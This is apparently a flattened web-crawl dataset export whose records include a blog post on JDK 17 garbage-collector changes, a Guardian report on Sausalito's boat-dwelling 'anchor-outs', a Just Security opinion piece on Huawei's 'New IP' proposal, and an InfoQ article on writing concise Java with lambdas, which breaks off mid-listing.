id
int64
3
41.8M
url
stringlengths
1
1.84k
title
stringlengths
1
9.99k
author
stringlengths
1
10k
markdown
stringlengths
1
4.36M
downloaded
bool
2 classes
meta_extracted
bool
2 classes
parsed
bool
2 classes
description
stringlengths
1
10k
filedate
stringclasses
2 values
date
stringlengths
9
19
image
stringlengths
1
10k
pagetype
stringclasses
365 values
hostname
stringlengths
4
84
sitename
stringlengths
1
1.6k
tags
stringclasses
0 values
categories
stringclasses
0 values
17,518,519
https://www.youtube.com/watch?v=c9Xt6Me3mJ4
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
28,565,467
https://tschatzl.github.io/2021/09/16/jdk17-g1-parallel-gc-changes.html
JDK 17 G1/Parallel GC changes
Tschatzl @ Github
# JDK 17 G1/Parallel GC changes A few days ago JDK 17 went GA. For this reason it is time for another post that attempts to summarize most significant changes in Hotspot´s stop-the-world garbage collectors in that release - G1 and Parallel GC. Before getting into detail about what changed in G1 and Parallel GC, a short overview with statistics about the whole GC subcomponent: there has been no JEP in the garbage collection area. The full list of changes for the entire Hotspot GC subcomponent is here, clocking in at 312 changes in total. This is in line with recent releases. Before talking about the stop-the world collectors, a brief look over to ZGC: this release improved usability by dynamically adjusting concurrent GC threads to match the application to on the one hand optimize throughput and on the other hand avoid allocation stalls (JDK-8268372). Another notable change, JDK-8260267 reduces mark stack memory usage significantly. Per is likely going to share more details in his blog soon. ## Generic improvements - The VM can now use different large page sizes for different memory reservations since JDK-8256155: i.e. the code cache may use differently sized large pages than the Java heap and other large reservations. This allows better usage of configured large pages in the system. My colleague Stefan has some write-up on why and how to use large pages here. ## Parallel GC Parallel GC pauses have been sped up a bit by making formerly serial phases in the pauses to be executed in parallel more than before. This includes - JDK-8204686 that implements **dynamic parallel reference processing**like G1 does for some time now. Previous work in the last few releases allowed easy implementation of this feature. It works just like the G1 implementation:- based on the amount of `java.lang.ref.Reference` instances that need reference processing for a given type (Soft, Weak, Final and Phantom) during a given garbage collection, Parallel GC now starts different amounts of threads for a particular phase of reference processing. Roughly, the implementation divides the observed number of`j.l.ref.References` for a given phase by the value of`ReferencesPerThread` (default`1000` ) to determine the amount of threads Parallel GC is going to use for that particular phase. - the option `ParallelRefProcEnabled` is enabled by default now, enabling this mechanism. Since the introduction of this feature in G1 in JDK 11 we have not heard complaints, so this seems appropriate. Please also check the Release Notes. - based on the amount of - Similarly, processing of **all internal weak references**has been changed to automatically exploit parallelism in JDK-8268443. - Finally, JDK-8248314 shaves off **a few milliseconds of Full GC pauses**for the same reason. We also noticed small single-digit percent improvements in throughput in some applications compared to JDK 16, which, are however more likely related to compiler improvements in JDK 17 than GC ones. That is, unless above changes are exactly solving your application’s issue. ## G1 GC - G1 now schedules **preventive garbage collections**with JDK-8257774. This contribution by Microsoft introduces a special kind of young collection with the purpose to avoid typically long pauses with evacuation failures. This situation, where there is not enough space to copy objects to, often occurs because of a high rate of short-living humongous object allocation - they may fill up the heap before G1 would normally schedule a garbage collection.So instead of waiting for this situation to happen, G1 starts an out-of-schedule garbage collection while it can still be confident to have enough space to copy surviving objects to, assuming that eager reclaim will free up lots of heap space and regular operation can continue. Preventive collections will be tagged as `G1 Preventive Collection` in the logs, i.e. the corresponding log entry could look like the following:`[...] [2.574s][info][gc] GC(121) Pause Young (Normal) (G1 Evacuation Pause) 86M->83M(90M) 5.781ms [2.582s][info][gc] GC(122) Pause Young (Normal) (G1 Evacuation Pause) 86M->83M(90M) 4.936ms [2.596s][info][gc] GC(123) Pause Young (Normal) (G1 Preventive Collection) 86M->84M(90M) 9.997ms [...]` Preventive garbage collections are enabled by default. They may be disabled by using the diagnostic flag `G1UsePreventiveGC` in case they cause regressions. - A significant bug with **large page handling on Windows has been fixed**: JDK-8266489 enables G1 to use large pages when the region size is larger than 2 MB, increasing performance significantly in some cases on larger Java heaps. - With JDK-8262068 Hamlin Li **added support for the**option in G1 Full GC in addition to Serial and Parallel GC. This option controls how much waste is tolerated in regions scheduled for compaction. Regions that have a higher live occupancy than this ratio (default 95%), are not compacted because compacting them would not return an appreciably amount of memory, and take a long time to compact only.`MarkSweepDeadRatio` In some situations this may be undesirable. If you want maximum heap compaction for some reason, manually setting this flag’s value to `100` disables the feature (like with the other collectors). - Significant memory savings may be gained by **pruning collection sets early**(JDK-8262185): with that change, G1 tries to keep the remembered sets only for a range of old generation regions that it will almost surely evacuate, not all possible useful candidates. There is a posting on my blog that highlights the problem and shows potential gains. Some additional parallelization of parts of the GC phases (e.g. JDK-8214237) may result in overall improved performance as e.g. reported here. ## Other Noteworthy Changes In addition, there are JDK 17 changes that are important but less or not visible at all for end users. - we started to **aggressively refactor the G1 collector code**. Particularly we are in the process of moving out code from the catch-all class`G1CollectedHeap` , trying to separate concerns and slice it into more understandable components. This already improves maintainability and hopefully speeds up further work. ## What’s next Of course the GC team and other contributors are already actively working on JDK 18. Here is a short list of interesting changes that are currently in development and you may want to look out for. Without guarantees, as usual, they are going to be integrated when they are done ;-) - First, the actually **already integrated change**JDK-8017163**massively reduces G1 memory consumption at no cost**. This rewrite of remembered set data storage reduces its footprint by around 75% from JDK 17 to JDK 18. The following figure shows memory consumption as reported by NMT for the GC component for some database-like application as a teaser for various recent JDKs.Particularly note the yellow line showing current (18b11) total memory usage compared to 17b35 (pink) and 16.0.2 (blue). You can calculate remembered set size by subtracting other GC component memory usage represented by the “floor” (cyan) from a given curve. There will be a **more thorough evaluation**and explanation of the change in the**future in this blog**. At least remembered set size tuning should to a large degree be a thing of the past. More changes building on this change to improve performance and further reduce remembered set memory size are planned. - **Serial GC, Parallel GC and ZGC support string deduplication**like G1 and Shenandoah in JDK 18. JEP 192 gives details about this technique, now applicable to all Hotspot collectors. - **Support for archived heap objects for Serial GC**is in development in JDK-8273508. - Hamlin Li is currently doing great work on **improving evacuation failure handling**with the apparent**goal to enable region pinning in G1**in the future; I wrote a short post on the problems and possible approaches earlier. More to come :) ## Thanks go to… Everyone that contributed to another great JDK release. See you in the next release :) *Thomas*
true
true
true
null
2024-10-12 00:00:00
2021-09-16 00:00:00
null
null
null
null
null
null
39,873
http://www.gobignetwork.com/wil/2007/8/6/there-is-no-such-thing-as-having-quotno-competitionquot/10182/view.aspx
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
29,061,163
https://www.theguardian.com/us-news/2021/oct/31/anchor-outs-sausalito-california-richardson-bay
The anchor-outs: San Francisco’s bohemian boat dwellers fight for their way of life
Erin McCormick
For decades, a group known as the “anchor-outs” enjoyed a relatively peaceful existence in a corner of the San Francisco Bay. The mariners carved out an affordable, bohemian community on the water, in a county where the median home price recently hit $1.8m. But their haven could be coming to an end – and with it, a rapidly disappearing way of life. The anchor-outs live aboard semi-derelict boats abutting the town of Sausalito, an upscale enclave just north of the Golden Gate Bridge in Marin county where mansions boast floor-to-ceiling windows overlooking the water. Tourists arrive by ferry from the city on weekends, strolling the promenade of restaurants, wine bars, art galleries and boutiques. The agency that oversees the local waterway known as the Richardson Bay has in recent months begun a fervent crackdown on the boat dwellers, who they say are here illegally and pose a threat to safety and the marine environment.** **Determined to clear the waters, a hardline harbormaster has even begun confiscating and destroying boats that overstay their welcome. The anchor-outs, meanwhile, are fighting back, staging protests and clashing with authorities who they say are in effect rendering them homeless. On a recent afternoon, the sounds of a tractor’s hydraulic arm crushing a fiberglass sailboat carried on the wind. The noise lingered over a homeless encampment that has grown near the waterfront. “Camp Cormorant”, as boaters nicknamed it, has become the political base of the anchor-outs’ protest movement. For the 50 or so people camped in neat rows of tents, the frequent whir, crunch and crack of the crusher represents their way of life being torn to bits. Many say they were forced to decamp here after their vessels were destroyed. “They want to take our homes and shut the anchorage down,” says Jeff Jacob Chase, a 20-year anchor-out with a trademark pirate swagger, a long, salt-and-pepper beard, spectacles and floppy hat.** **“They basically want to eradicate a culture.” In a region dominated by water, boats have been used as a cheap source of housing since the Gold Rush, when miners lived aboard vessels. In the 1950s, a community of bohemians and artists grew along the Sausalito shoreline, with residents building wildly creative floating constructions that offered shelter and inspiration to Beat writers and artists such as Allen Ginsberg and Shel Silverstein. It transformed into a hippy music scene in the 1960s, but in the mid-1970s, residents of those houseboats were mostly pushed out in a series of local enforcement actions known as “the houseboat wars”. Despite its beatnik origins, today the Richardson Bay hosts a unique waterfront class system. At the top are the authorized houseboat marinas where floating, luxury homes with shingle siding, plumbing and electricity can sell for more than $1m. Other boaters, known as live-aboards, can pay a monthly fee to dwell on their sailboats and cabin cruisers in a marina slip, but the number of spots is tightly controlled and authorities say there is a long waiting list. Finally there are the anchor-outs, whom some see as the last of a dying breed of free spirits who eschew the world of rent deposits, credit checks and bills. The anchor-outs get by with minimal resources, hauling their own water and generating power from tiny solar panels. They brave the bay’s famous winds to travel to and from the shore in rowboats or motorized dinghies. Housing advocates say the battle over their way of life is just the latest chapter in a crisis that has seen living options for low-income residents all but vanish. Chase still has his sailboat, a sloop named the Jubilee, but he also spends time in Camp Cormorant, organizing his fellow boaters to protest against the evictions as an officer of the local chapter of the California Homeless Union. “What they’re doing is criminalizing this entire community,” said Chase. ## Waterfront patrols and crushed boats Curtis Havel, the harbormaster, would be the first to call himself the villain of this story. It’s a breezy Wednesday morning and Havel is out patrolling the waters. He stands on the bow of his aluminum patrol boat and gestures at the spectacular scenery around him. “For a long time, people regarded Richardson’s Bay as this sort of bohemian live-and-let-live situation and the vessel count continued to increase,” he says. “Now it’s time for us to enforce our rules.” The state agency that oversees the San Francisco Bay had been building pressure on local authorities to act, and Havel says clearing the harbor of illegal anchoring was the primary mission he was given when he was hired two years ago. Citing a long-unenforced rule that says boats can anchor for no more than 72 hours, Havel has been confiscating boats, dragging them into a shipyard and crushing them into chunks. Of the 190 boats out here when he took over, Havel says he has gotten rid of all but 86 vessels – about 70 of which are now occupied by full-time residents. Havel argues boats and their occupants can cause a laundry list of problems and environmental concerns. Their anchors drag along the bottom and destroy the eelgrass, an important habitat for marine life. Boats break loose from their anchors during storms, endangering those aboard and others along the shore. The residents dump sewage and leave abandoned boats and parts polluting the bay. And there have been complaints about drug use and crime. Havel says his enforcement has made him unpopular, but he’s willing to take some flak in order to get the job done. His patrol boat edges up to the side of a rusting, metal-hulled craft, piled with plywood and corrugated metal, which appears to have become home to a flock of seagulls. Havel had already plastered a note on the side of the boat, warning that it would be disposed of if not removed within 10 days. “I hate to even call this a boat; at this point it’s just a shell,” he says, adding that he hasn’t seen occupants aboard the vessel for several months. “That’s a dead boat you’re looking at.” Havel recently announced plans to leave his role at the end of the month, and while his agency appears undeterred in its mission, he says they are trying to find long-term solutions. The state has agreed to extend the timeline for clearing the bay by a few years, and for those still living aboard, Havel says, the county plans to send outreach workers to help find other housing. But around the anchorage, signs of rebellion abound. Some boats fly upside down American flags, the maritime signal for distress. Occupants of a boat named Evolution have taped up a big, hand-stenciled “R”, rebranding it the “REvolution”. As Havel patrols, a metal dinghy motors up behind him. The driver, a boat-dweller with a white megaphone, starts shouting at Havel, peppering his taunts with expletives. “Tell them how you’ve been crushing people’s homes, sir,” yells the man. Havel, however, appears unflustered. “It’s always been politically charged; it’s just getting heightened because we’re doing something.” ## ‘I’m not homeless, I’m houseless’ Authorities say they have been seizing only abandoned and derelict boats, but around Camp Cormorant, numerous residents claim to have lost their homes to the crusher. Michael Adams and his wife lived in the anchorage for decades, raising two kids. The couple had recently become afraid to leave their boat, a historic 1928 pleasure cruiser named the Marlin, for fear it would get destroyed. “I went off one morning and he crushed it,” says Adams as he paints a mural on the plywood patio he built in front of the tent he and his wife now call home. Robyn Kelly, a former skincare technician, moved into the anchorage after giving up her apartment and job to care for her sick mother, and ended up living on a 28ft power boat for a decade. She says it made an excellent home, until one day in 2019 she found it had been confiscated by the harbormaster. “I went away for 24 hours and I came back and it was gone,” said Kelly, who has since filed a lawsuit against the authorities for destroying her boat and possessions. Kelly and her two pups, Hank and Nacho, are currently staying on a friend’s boat; she’d like to move back to shore but her small income isn’t enough to make the deposit for an apartment, and her arthritis is starting to give her trouble. “I couldn’t afford an apartment now,” she said. “I’d love one.” Kelly’s friend, Billy McClean, is a fourth-generation Marin county resident. He can look across the water from where his Dutch cruiser is anchored and see stately houses constructed nearly a century ago by his grandfather, a local builder. He recalls growing up seeing people living freely on the water. “When I was a teenager I used to come down here to the boats and buy pot from what I called ‘the hippies’,” he says. “Now I live here.” McClean says people like him have been priced out of the region by an influx of tech workers making six-figure salaries. McClean couldn’t afford a decent apartment at his previous job working for a fencing company – so he bought a cheap motorboat and moved into the anchorage in 2009. His vessel has a TV, DVD player and a small refrigerator, all powered by a generator. He doesn’t have much space inside, but from his white decks he can see green waters and California hillsides all around him. “It’s nice out here – and then it’s not,” he said. “It’s a lot of work – and in the winter, it can be downright life threatening.” A short skiff ride across the anchorage from McClean, Brian Doris is fixing up an old pleasure yacht named Marlia that he bought for $1 after it was abandoned. The outside of his boat is still cluttered with toolboxes and boat repair supplies, but he’s transformed the interior with sumptuous Turkish rugs and plants. “I’m not homeless, I’m houseless,” says Doris, who says he can no longer sleep on land because he misses the rocking of the waves. Like many anchorage residents, Doris scoffs at the idea of being placed into shelter housing. “This is my home,” he says, adding if they want to take his boat, they should “bring a body bag”. ## The last of a dying breed Jennifer Friedenbach, the executive director of the San Francisco-based Coalition on Homelessness, says living on a boat was one of many “very-low-income housing options” that used to exist in California along with residential hotels and live-work spaces in warehouses. But these types of marginal housing have vanished. “Once gentrification came, those options disappeared, and that puts pressure on homelessness,” says Friedenbach. Timothy Logan, a boat owner descended from three generations of California travelers, bought his houseboat cruiser the SS Patio nine years ago to serve as his primary residence. But since then, he has been kicked out of one harbor after another. He started as a resident of a marina in Sacramento, living along river waters that feed into the San Francisco Bay. That marina closed for development, so he moved his boat to other harbors, including ones in Antioch and Oakland, only to see boaters kicked out of those places too. “Out of the blue, the whole state of California was like: ‘You can’t live on the water,’”he says. While the SS Patio is still anchored out in Richardson Bay, Logan fears his boat will eventually end up being crushed like many of his friends’. Havel, the harbormaster, and authorities governing both Richardson Bay and the state of California say they are determined that within five years, the last of the anchor-outs will be gone. For their part, the anchor-outs don’t intend to go quietly. “We are a community; we’re trying to stick together,” says Logan.
true
true
true
Since the 1950s, Marin county waters have been home to a community of mariners. Now local authorities say they have to leave
2024-10-12 00:00:00
2021-10-31 00:00:00
https://i.guim.co.uk/img…eb8a00cb9ff9aa6e
article
theguardian.com
The Guardian
null
null
26,834,179
https://www.justsecurity.org/75741/chinas-dystopian-new-ip-plan-shows-need-for-renewed-us-commitment-to-internet-governance/
China’s Dystopian “New IP" Plan Shows Need for Renewed US Commitment to Internet Governance
Mark Montgomery; Theo Lebryk
China released its 14th Five-Year plan for economic development last month, including its intended next steps in technology. The blueprint makes clear that, even before the ink is dry on many 5G contracts for broadband telecommunications, China and its networking giant Huawei are gearing up to ensure their vision of the internet goes global. But Huawei’s plans for 6G and beyond make U.S. concerns over 5G look paltry: Huawei is proposing a fundamental internet redesign, which it calls “New IP,” designed to build “intrinsic security” into the web. Intrinsic security means that individuals must register to use the internet, and authorities can shut off an individual user’s internet access at any time. In short, Huawei is looking to integrate China’s “social credit,” surveillance, and censorship regimes into the internet’s architecture. The New IP proposal itself rests on a flawed technical foundation that threatens to fragment the internet into a mess of less interoperable, less stable, and even less secure networks. To avoid scrutiny of New IP’s shortcomings, Huawei has circumvented international standards bodies where experts might challenge the technical shortcomings of the proposal. Instead, Huawei has worked through the United Nations’ International Telecommunications Union (ITU), where Beijing holds more political sway. The appropriate place for a review of the New IP concept would be the Internet Engineering Task Force (IETF). The IETF and other standards bodies are examining most of the technical changes to internet infrastructure that make up the New IP proposal, and these bodies have said it is premature to make a dramatic change without more information and consensus. Huawei’s plan to rebuild the internet from the top-down based on speculative-use cases – uses of the internet that *might* one day exist as opposed to an established use that current users or businesses are already clamoring for – bucks the logic of internet governance, which postulates that change should be incremental and based on established needs. **Authoritarian Blocs** Huawei’s and the Chinese Communist Party’s (CCP’s) turn to the ITU is no surprise, even though the ITU’s jurisdiction does not include internet architecture. When it comes to internet governance, the CCP and other authoritarian regimes have long favored *multilateral* international institutions like the ITU over *multistakeholder* international institutions such as the IETF or the International Corporation for Assigned Names and Numbers (ICANN). Multistakeholder institutions are governed by a diverse array of representatives from industry, civil society, and government; multilateral institutions only provide voting power to national governments. In multistakeholder fora, civil society and industry representatives tend to favor a free and open internet, which dilutes the influence of national governments, many of whom are likely to favor a tightly regulated, censorable internet. Authoritarian governments can marginalize private industry and citizens’ groups by working through multilateral fora such as the ITU, meaning the U.N. and the ITU will naturally be more receptive to proposals like New IP that grant national governments more control over the internet. In 2019, China and Russia leveraged a similar authoritarian bloc within the U.N. to pass a censorship-friendly cybercrime resolution. A comparable coalition of likeminded countries could help China push through the New IP proposal, shortcomings and all. Circumventing conventional internet-governance institutions in favor of the ITU also sets a precedent for future internet governance-related proposals to go through the ITU instead of more-balanced multistakeholder institutions. What’s more, China has held the top position in the ITU for the last seven years. During his tenure as secretary-general of the ITU, Houlin Zhao of China has encouraged the expansion of the ITU’s mandate from just a telecommunications agency to a “technology agency” by working on technology unrelated to telecommunications such as internet architecture, the internet of things (IoT), and artificial intelligence (AI). **Organizing the U.S. Government for Success** Because of limitations due to the COVID-19 pandemic, the ITU’s World Telecommunication Standardization Assembly (WTSA-20), where New IP will be formally debated, has been delayed until February 2022. Therefore, Washington has time to prepare for, and confront, the first major referendum on New IP, even if it is in a less-desirable standards forum. In its March 2020 report, the U.S. Cyberspace Solarium Commission (CSC) highlighted another issue, the disparity between how the U.S. government engages at international fora like the ITU and the effort China is willing to make. In fact, New IP resulted in part from a previous U.S. abdication of presence and leadership, as the initial inquiry into the need for this new technology emerged out of a Huawei-dominated ITU focus group that lacked American input. This asymmetry in representation extends beyond that particular focus group. In the runup to the WTSA-20, China nominated representatives for management positions in virtually every ITU study group. Even when Chinese firms do not win leadership positions, China sends droves of meticulously prepared, synchronized delegations to push standards beneficial to Beijing and its national champions. By contrast, U.S. representatives appear to be prepared in an ad-hoc manner. The United States is officially competing for one-fourth the number of chairmanships or vice chairmanships as China at WTSA-20. In past meetings, the United States has endeavored to keep the ITU focused on its appropriate areas of expertise (telecommunications) and stay away from intervening on other issues (the internet, artificial intelligence, blockchain, etc.) better suited to other standards bodies. The United States is correct to oppose ITU mission creep on principle. However, simply voicing principled opposition by itself is not enough to contain Chinese efforts to push ITU mission creep. The CSC recommended that the United States make a concerted effort to compete with China on internet governance, and articulated that this effort will require (1) getting the U.S. government organized for success, (2) building effective public and private buy-in, and (3) working with like-minded international allies and partners. **Organized to Compete in International Fora** The first step is to get the U.S. government organized and resourced to compete with China in these fora. This requires the National Institute for Standards and Technology (NIST) at the Department of Commerce, as well as the State Department and sector-specific agencies to work together to develop a strategic approach to dealing with issues like New IP at international fora. This will require increased funding for NIST. The establishment of a State Department Bureau for Cyberspace Policy, as laid out in the Cyber Diplomacy Act of 2021, would provide much of the organizational reform required. However, the State Department will require increased funding and focus to coordinate action and address the challenge of declining U.S. influence in internet governance and international digital standards. A good first objective should be electing an ITU secretary-general who will respect the limitations of the ITU’s mandate and who is less amenable to government control over the internet. A U.S. representative, Doreen Bogdan-Martin, is running for the position in 2022. Even if Bogdan-Martin does not win the election, the United States should work to ensure the eventual winner will discontinue Zhao’s policy of ITU mission creep into areas such as New IP. The worst-case scenario would be for Russia’s candidate, Rashid Ismailov, to win the secretary-generalship. Ismailov leads a delegation that routinely attempts to enhance the ITU’s power over internet governance at the expense of multistakeholder institutions. Ismailov is personally on record advocating for “providing governments and non-profit organizations with an opportunity to control activities” of ICANN, one of the most important multistakeholder bodies in internet governance. Ensuring Ismailov or a like-minded candidate does not win should be a top priority for the United States. The second step toward ensuring the United States can compete effectively with China on internet governance is determining the optimal mix of incentives and prodding to get American firms to more actively represent U.S. interests. Historically, when the United States leaves engagement in international fora up to its private enterprises alone, American firms’ main incentive for participating becomes direct self-interest. U.S. firms see limited incentives to make long-term commitments to slower-moving international fora such as the ITU’s standardization arm, the ITU-T. To put it another way, no firm wants to waste its resources playing defense against abstract, long-term threats such as Huawei’s plan to reinvent the internet. By contrast, Chinese firms receive financial incentives from the government to craft international standards and are publicly pressured into acting as a united front in these bodies. This hands-off approach to public-private collaboration on the part of the United States is insufficient when it comes to international standard setting and is in part what allowed Huawei to assert influence in the standards bodies such as the ITU-T and 3GPP in recent years. U.S. government and industry must work together on the vast majority of issues where the two can agree and thus counter Chinese efforts. Third, the United States needs to build coalitions of likeminded countries in internet-governance institutions. Strengthening ties and coordinating action with traditional allies is critical but insufficient. The United States also needs to find common ground with non-traditional partners that may not share U.S. values of an open internet but are also skeptical of a Chinese-led order. The 2019 Sino-Russian cybercrime resolution, which initiated the drafting process for a treaty that would enable governments to clamp down on free speech on the internet, passed in part because 34 countries abstained. Convincing countries like Mexico, Brazil, and the Philippines to oppose China’s power plays will be key to preventing initiatives like New IP from taking hold. The United States cannot afford a similar failure to compete, as was the case in international fora associated with 5G development and international cybercrime. Chinese dominance in standardization will cost American firms market share and can open the door for more Chinese backdoors around the globe. Huawei dominance on New IP and 6G would not only create a less free, less interoperable internet, it would pave the way for authoritarian governments to gain expanded say over future changes to the internet for years to come. The Chinese New IP proposal can be successfully contested, but only if the United States rallies its private-industry partners and like-minded international democratic governments to the cause. They must all work together to collectively rein in the threat of authoritarian governments using multilateral institutions such as the ITU to export their vision of the internet worldwide before it is too late.
true
true
true
The US must rally partners to rein in the abuse of multilateral institutions for Huawei’s plans on 6G and beyond, which make concerns over 5G look minor.
2024-10-12 00:00:00
2021-04-13 00:00:00
https://i0.wp.com/www.ju…1024%2C681&ssl=1
article
justsecurity.org
Just Security
null
null
1,652,064
http://digitizor.com/2010/09/01/ksplice-uptrack-is-now-free-in-fedora/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
9,451,048
http://www.infoq.com/articles/Concise-Java
Concise Java
Casimir Saternos
Computer scientists emphasize the value of conciseness of expression in problem solving. Unix pioneer Ken Thompson once famously stated, “One of my most productive days was throwing away 1000 lines of code.” This is a worthy goal on any software project requiring ongoing support and maintenance, yet can be lost by a focus on software development metrics like lines-of-code. Early Lisp contributor Paul Graham went as far as to equate succinctness in a programming language with its power. This notion of power has made the ability to write compact, simple code a primary criterion for language selection in many modern software projects. Any program can be made shorter by refactoring it to remove superfluous code or extraneous filler like whitespace, but certain languages are inherently expressive and particularly well suited for writing short programs. With this quality in mind, Perl programmers popularized code golf competitions; the goal being to use the shortest amount of code possible to solve a particular problem or implement a specific algorithm. The APL language was designed to use special graphical symbols that allowed programmers to write powerful programs with tiny amounts of code. Such programs, when properly implemented, map well to standard mathematical representations. Terse languages can be very effective for quickly creating small scripts, particularly when used in clearly delineated problem domains where their brevity does not obscure their purpose. Java has a reputation for being verbose relative to other programming languages. This is partially due to established practices in the programming community, which in many instances allow for a greater degree of descriptiveness and control when performing a task. For example, long variable names can make a large codebase more readable and maintainable over the long term. Descriptive class names generally map to file names, which immediately clarify where new functionality should be added to an existing system. When used consistently, descriptive names can greatly simplify searching for text indicating a particular functionality within an application. These practices have contributed to Java’s great success in large-scale implementations with large, complex code bases. Conciseness is preferred in smaller projects, and some languages are well-suited for writing short scripts or for interactive exploratory programming at a prompt. Java is extremely useful as a general-purpose language for writing cross-platform utilities. In such situations, the use of “verbose Java” doesn’t necessarily provide additional value. Although code style can be altered in areas such as the naming of variables, certain fundamental aspects of the Java language have historically required the use of more characters to accomplish a task than comparable code in other programming languages. In response to such limitations, the language has been updated over time to include features typically classified as “syntactic sugar.” These idioms allow the same functionality to be expressed with fewer characters. Such idioms are preferable to their more verbose counterparts and have generally been quickly adopted into common usage by the programming community. This article will highlight practices for writing concise Java code, with a special focus on the new functionality available in JDK 8. Shorter, more elegant code is possible due to the inclusion of Lambda Expressions in the language. This is especially evident when processing collections using the new Java Streaming API. ## Verbose Java Java’s reputation for verbosity is partially due to its implementation style of object-orientation. The classic example of a “Hello World” program can be implemented in many languages in a single line of code containing less than 20 characters. In Java this requires a main method within a class definition which contains a method call to write the string using System.out.println(). At minimum, with only the requisite sprinkling of method qualifiers, brackets and semicolons the minimal “Hello World” program with all whitespace removed tops out at 86 characters. Coupled with spacing and a bit of indentation for readability, the “Hello World” program provides an inarguably wordy first impression. Java’s verbosity is partially due to community standards that opt for descriptiveness over brevity. It is trivial to opt for different standards related to code format aesthetics in this regard. In addition, methods and sections of boilerplate code can be wrapped in methods that can be incorporated into APIs. Refactoring a program with an eye towards brevity can greatly simplify it without sacrificing accuracy or clarity. Java’s reputation for verbosity is at times skewed by a plethora of old code examples. Many books have been written about Java over the years. Since Java has been around since the beginnings of the world wide web, many online resources provide snippets from the earliest versions of the language. But Java has matured over the years in response to perceived deficiencies, and so even accurate and well implemented examples might not take advantage of later language idioms and APIs. Java’s design goals specified that it be object-oriented, familiar (which at that time meant using C++ style syntax), robust, secure, portable, threaded and highly performant. Brevity was not a goal. Functional languages provide terse alternatives to comparable tasks implemented using an object-oriented syntax. Lambda Expressions added in Java 8 open the door to functional programming idioms which alter the appearance of Java and reduce the amount of code needed to perform many common tasks. ## Functional Programming Functional Programming makes the function the central construct for programmers. This allows functions to be used in a very flexible manner such as passing them as arguments. Based on this capability Java lambda expressions enable you to treat functionality as method arguments or code as data. A lambda expression can be thought of as an unnamed method independent of any specific class association. There is a rich and fascinating mathematical basis for these ideas. Functional programming and lambda expressions can be perceived as abstract, esoteric concepts. For a programmer chiefly concerned with tackling a task in industry, there might not be an interest in catching up on the latest computational trends. With the introduction of lambdas into Java, it is necessary for developers to understand these new features at least to the degree that programs written by other developers can be understood. There are practical benefits that can affect the design of concurrent systems that results in better performance. And, what is of immediate interest in this article is how these mechanisms can be used to craft short yet clear code. There are several reasons lambda expressions produce code brevity. Fewer local variables are used reducing clutter required to declare and set them. Loops can be replaced with method calls, reducing three or more lines to a single line of code. Code traditionally expressed in nested loops and conditional statements can be expressed in a single method. Implemented as fluent interfaces, methods can be chained together in a manner analogous to Unix piping. The net effect of writing code in a functional style is not limited to readability. Such code can avoid maintaining state and be side-effect free. Such code has the added benefit of being easily parallelized for more efficient processing. ### Lambda Expressions The syntax related to lambda expressions is straightforward, but is unlike idioms seen in previous versions of Java. A lambda expression is made up of three parts, an argument list, an arrow, and a body. An argument list may or may not include parenthesis. A related operator consisting of a double colon has also been added that can further reduce the amount of code required for certain lambda expressions. This is known as a method reference. ### Thread Creation In this example, a thread is created and run. The lambda expression appears on the right side of the assignment operator and specifies an empty argument list with the simple outcome of a message being written to standard out when the thread is run. ``` `````` Runnable r1 = () -> System.out.print("Hi!"); r1.run() ``` | | | | | | ## Processing Collections One of the primary places where the presence of Lambdas will be noticed by many developers is in relation to the Collections API. Consider a list of Strings that we wish to sort by their length. ``` `````` java.util.List<String> l; l= java.util.Arrays.asList(new String[]{"aaa", "b", "cccc", "DD"}); ``` A lambda expression can be created to implement this functionality. ``` `````` java.util.Collections.sort(l, (s1, s2) -> new Integer(s1.length()). compareTo(s2.length()) ``` This example includes two arguments which are passed to the body of the lambda so that their lengths can be compared. | | | | | | There are several alternatives available to operate on each element in a list without resorting to standard “for” or “while” loops. Comparable semantics can be achieved by passing a lambda to the collection’s “forEach” method. In that case, no parenthesis is used with the single argument passed. | | | | | | | This particular example can be further shortened using a method reference to separate the containing class and a static method. Each element is passed to the println method in turn. ``` ````l.forEach(System.out::println)` ### The java.util.stream package is new to Java 8 and uses syntax familiar to functional programmers to process collections. Its summary explains its contents as ### Concise Java “Classes to support functional-style operations on streams of elements, such as map-reduce transformations on collections.” The class diagram that follows provides an overview of the package with an emphasis on functionality that will be exercised in a subsequent example. The package structure lists a number of Builder classes. Such classes are common with fluent interfaces that allow methods to be chained together into a pipelined set of operations. Although string parsing and collection manipulation is simple, it has many practical real-world applications. Sentences need to be segmented into separate words when doing Natural Language Processing (NLP). Bioinformatics represents macromolecules like DNA and RNA as Nucleobases consisting of letters such as C, G, A, T, or U. In each problem domain, Strings are broken down and constituent parts are manipulated, filtered, counted and sorted. So although the example contains very simple use cases, the concepts are generalizable to a wide variety of meaningful tasks. The example code parses a String containing a sentence and counts the number of words and letters of interest. The complete listing is just under 70 lines of code including whitespace. ``` `````` 1. import java.util.*; 2. 3. import static java.util.Arrays.asList; 4. import static java.util.function.Function.identity; 5. import static java.util.stream.Collectors.*; 6. 7. public class Main { 8. 9. public static void p(String s) { 10. System.out.println(s.replaceAll("[\\]\\[]", "")); 11. } 12. 13. private static List<String> uniq(List<String> letters) { 14. return new ArrayList<String>(new HashSet<String>(letters)); 15. } 16. 17. private static List<String> sort(List<String> letters) { 18. return letters.stream().sorted().collect(toList()); 19. } 20. 21. private static <T> Map<String, Long> uniqueCount(List<String> letters) { 22. return letters.<String>stream(). 23. collect(groupingBy(identity(), counting())); 24. } 25. 26. private static String getWordsLongerThan(int length, List<String> words) { 27. return String.join(" | ", words 28. .stream().filter(w -> w.length() > length) 29. .collect(toList()) 30. ); 31. } 32. 33. private static String getWordLengthsLongerThan(int length, List<String> words) 34. { 35. return String.join(" | ", words 36. .stream().filter(w -> w.length() > length) 37. .mapToInt(String::length) 38. .mapToObj(n -> String.format("%" + n + "s", n)) 39. .collect(toList())); 40. } 41. 42. public static void main(String[] args) { 43. 44. String s = "The quick brown fox jumped over the lazy dog."; 45. String sentence = s.toLowerCase().replaceAll("[^a-z ]", ""); 46. 47. List<String> words = asList(sentence.split(" ")); 48. List<String> letters = asList(sentence.split("")); 49. 50. p("Sentence : " + sentence); 51. p("Words : " + words.size()); 52. p("Letters : " + letters.size()); 53. 54. p("\nLetters : " + letters); 55. p("Sorted : " + sort(letters)); 56. p("Unique : " + uniq(letters)); 57. 58. Map<String, Long> m = uniqueCount(letters); 59. p("\nCounts"); 60. 61. p("letters"); 62. p(m.keySet().toString().replace(",", "")); 63. 